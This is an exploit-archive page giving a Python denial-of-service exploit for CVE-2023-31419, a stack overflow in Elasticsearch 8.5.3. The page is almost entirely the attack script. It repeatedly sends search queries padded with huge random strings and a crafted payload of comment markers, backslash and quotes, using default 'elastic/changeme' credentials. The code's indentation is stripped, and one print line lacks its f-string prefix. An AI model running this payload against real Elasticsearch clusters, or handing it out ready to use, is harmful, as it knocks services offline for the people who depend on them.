Elasticsearch 8.5.3 Stack Overflow

2023.09.24

Credit: Touhami Kasbaoui

Risk: High

Local: No

Remote: Yes

CVE: CVE-2023-31419

CWE: CWE-119

# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://elastic.co/
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
import requests
import random
import string
es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL
index_name = '*'
payload = "/*" * 10000 + "\\" +"'" * 999
verify_ssl = False
username = 'elastic'
password = 'changeme'
auth = (username, password)
num_queries = 100
for _ in range(num_queries):
symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
search_query = {
"query": {
"match": {
"message": (symbols * 9000) + payload
}
}
}
print(f"Query {_ + 1} - Search Query:")
search_endpoint = f'{es_url}/{index_name}/_search'
response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
if response.status_code == 200:
search_results = response.json()
print(f"Query {_ + 1} - Response:")
print(search_results)
total_hits = search_results['hits']['total']['value']
print(f"Query {_ + 1}: Total hits: {total_hits}")
for hit in search_results['hits']['hits']:
source_data = hit['_source']
print("Payload result: {search_results}")
else:
print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Elasticsearch 8.5.3 Stack Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.